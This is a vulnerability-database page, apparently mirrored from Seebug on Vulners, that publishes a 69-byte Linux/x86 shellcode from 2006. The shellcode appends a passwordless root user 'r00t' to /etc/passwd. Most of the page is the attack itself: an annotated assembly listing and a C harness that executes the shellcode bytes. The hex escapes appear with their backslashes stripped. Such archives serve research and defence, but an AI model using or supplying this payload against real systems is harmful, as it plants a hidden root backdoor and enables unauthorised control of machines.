Lucene search

K

linux/x86 add root user r00t with no password to /etc/passwd 69 bytes

🗓️ 07 Feb 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Linux/x86 shellcode to add root user with no password to /etc/passw

Show more
Code

                                                /* By Kris Katterjohn 11/14/2006
 *
 * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
 *
 * for Linux/x86
 *
 *
 *
 * section .text
 *
 *      global _start
 *
 * _start:
 *
 * ; open("/etc//passwd", O_WRONLY | O_APPEND)
 *
 *      push byte 5
 *      pop eax
 *      xor ecx, ecx
 *      push ecx
 *      push 0x64777373
 *      push 0x61702f2f
 *      push 0x6374652f
 *      mov ebx, esp
 *      mov cx, 02001Q
 *      int 0x80
 *
 *      mov ebx, eax
 *
 * ; write(ebx, "r00t::0:0:::", 12)
 *
 *      push byte 4
 *      pop eax
 *      xor edx, edx
 *      push edx
 *      push 0x3a3a3a30
 *      push 0x3a303a3a
 *      push 0x74303072
 *      mov ecx, esp
 *      push byte 12
 *      pop edx
 *      int 0x80
 *
 * ; close(ebx)
 *
 *      push byte 6
 *      pop eax
 *      int 0x80
 *
 * ; exit()
 *
 *      push byte 1
 *      pop eax
 *      int 0x80
 */

main()
{
       char shellcode[] =
               "x6ax05x58x31xc9x51x68x73x73x77x64x68"
               "x2fx2fx70x61x68x2fx65x74x63x89xe3x66"
               "xb9x01x04xcdx80x89xc3x6ax04x58x31xd2"
               "x52x68x30x3ax3ax3ax68x3ax3ax30x3ax68"
               "x72x30x30x74x89xe1x6ax0cx5axcdx80x6a"
               "x06x58xcdx80x6ax01x58xcdx80";

       (*(void (*)()) shellcode)();
}


                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
07 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1
10
.json
Report